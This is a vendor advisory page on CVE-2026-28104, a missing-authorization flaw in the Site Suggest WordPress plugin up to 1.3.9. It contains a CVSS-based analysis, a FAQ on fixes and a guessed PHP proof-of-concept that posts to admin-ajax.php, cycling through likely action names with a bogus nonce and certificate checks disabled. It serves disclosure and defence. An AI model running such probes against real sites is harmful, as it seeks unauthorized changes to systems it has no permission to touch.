Atomic Edge analysis of CVE-2026-28104 (metadata-based):
The vulnerability is a Missing Authorization (CWE-862) flaw in the Site Suggest WordPress plugin versions up to 1.3.9. The description confirms the absence of a capability check on a function, allowing unauthenticated attackers to perform unauthorized actions. The CVSS vector (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) indicates network accessibility, low attack complexity, no privileges required, no user interaction, and low integrity impact with no confidentiality or availability effects. Atomic Edge research infers the vulnerability likely exists in a WordPress AJAX handler or REST API endpoint registered by the plugin. A common pattern for such plugins involves frontend submission forms that trigger backend functions. The missing authorization check permits unauthenticated users to invoke these functions directly. The specific unauthorized action cannot be confirmed without code, but typical impacts for similar plugins include unauthorized data submission, settings modification, or content injection. The fix requires adding a proper capability check, likely using current_user_can() for AJAX handlers or permission_callback for REST endpoints. Exploitation would involve sending crafted HTTP requests to the plugin’s exposed endpoint.

CVE-2026-28104: Site Suggest <= 1.3.9 – Missing Authorization (site-suggest)
CVE-2026-28104
site-suggest
1.3.9
—
Analysis Overview
Differential between vulnerable and patched code
Proof of Concept (PHP)
NOTICE :
This proof-of-concept is provided for educational and authorized security research purposes only.
You may not use this code against any system, application, or network without explicit prior authorization from the system owner.
Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.
This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.
By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-28104 - Site Suggest <= 1.3.9 - Missing Authorization
<?php
/**
* Proof of Concept for CVE-2026-28104.
* Assumptions based on WordPress plugin patterns:
* 1. The plugin registers an AJAX action hook without a capability check.
* 2. The action name likely contains 'site_suggest' or a derivative.
* 3. The endpoint is /wp-admin/admin-ajax.php.
* 4. The vulnerable function accepts POST parameters.
* This PoC attempts common AJAX action names.
*/
$target_url = 'https://example.com/wp-admin/admin-ajax.php';
// Common AJAX action patterns for the 'site-suggest' plugin
$possible_actions = [
'site_suggest_submit',
'site_suggest_save',
'site_suggest_action',
'sitesuggest_process',
'ss_ajax_handler'
];
foreach ($possible_actions as $action) {
$ch = curl_init();
$post_data = [
'action' => $action,
'data' => 'AtomicEdge_test_payload', // Generic test parameter
'nonce' => 'bypassed' // Nonce may be absent or not validated
];
curl_setopt_array($ch, [
CURLOPT_URL => $target_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => $post_data,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_TIMEOUT => 10
]);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($http_code == 200 && !empty($response)) {
echo "Potential vulnerable action found: $actionn";
echo "Response: $responsen";
break;
}
}
?>
Frequently Asked Questions
What is CVE-2026-28104?
Overview of the vulnerabilityCVE-2026-28104 is a security vulnerability in the Site Suggest plugin for WordPress, specifically versions up to and including 1.3.9. It is classified as a Missing Authorization issue, which allows unauthenticated users to perform unauthorized actions due to a lack of capability checks on certain functions.
How does this vulnerability work?
Mechanism of exploitationThe vulnerability arises from the absence of capability checks in the plugin’s functions, which means that unauthorized users can invoke these functions directly. This typically occurs through AJAX requests to the plugin’s endpoints, enabling attackers to perform actions without proper authentication.
Who is affected by this vulnerability?
Identifying impacted usersAny WordPress site using the Site Suggest plugin version 1.3.9 or earlier is at risk. Site administrators should check their installed plugins to determine if they are using a vulnerable version of Site Suggest.
How can I check if my site is vulnerable?
Steps to verify vulnerabilityTo check if your site is vulnerable, verify the version of the Site Suggest plugin installed on your WordPress site. If it is version 1.3.9 or earlier, your site is at risk and should be updated immediately.
How can I fix this vulnerability?
Mitigation stepsThe recommended fix is to update the Site Suggest plugin to the latest version where the vulnerability has been addressed. Additionally, developers should implement proper capability checks in the plugin’s AJAX handlers or REST API endpoints to prevent unauthorized access.
What does the CVSS score of 5.3 indicate?
Understanding severity levelsA CVSS score of 5.3 indicates a medium severity level, suggesting that while the vulnerability poses a risk, it may not be immediately critical. However, it is important to address it promptly to prevent potential exploitation.
What are the potential impacts of this vulnerability?
Consequences of exploitationIf exploited, this vulnerability could allow unauthorized users to submit data, modify settings, or inject content into the site. The exact impact would depend on the specific functions that lack authorization checks.
What is the proof of concept for this vulnerability?
Demonstrating the issueThe proof of concept provided illustrates how an attacker could exploit the vulnerability by sending crafted HTTP requests to the plugin’s AJAX endpoint. It attempts common action names associated with the plugin to demonstrate unauthorized access.
How can I protect my site from similar vulnerabilities?
Best practices for securityTo protect your site, regularly update all plugins and themes to their latest versions, monitor for security advisories, and implement security plugins that can help detect and mitigate vulnerabilities. Additionally, conduct regular security audits.
What should I do if I cannot update the plugin immediately?
Temporary measuresIf immediate updates are not possible, consider disabling the Site Suggest plugin until a fix can be applied. This will help mitigate the risk of exploitation while you work on a permanent solution.
Where can I find more information about this vulnerability?
Resources for further readingMore information can be found on the official CVE database, security advisories from WordPress, and the plugin’s repository. Keeping abreast of security updates from trusted sources is crucial for maintaining site security.
How Atomic Edge Works
Simple Setup. Powerful Security.
Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.
Trusted by Developers & Organizations






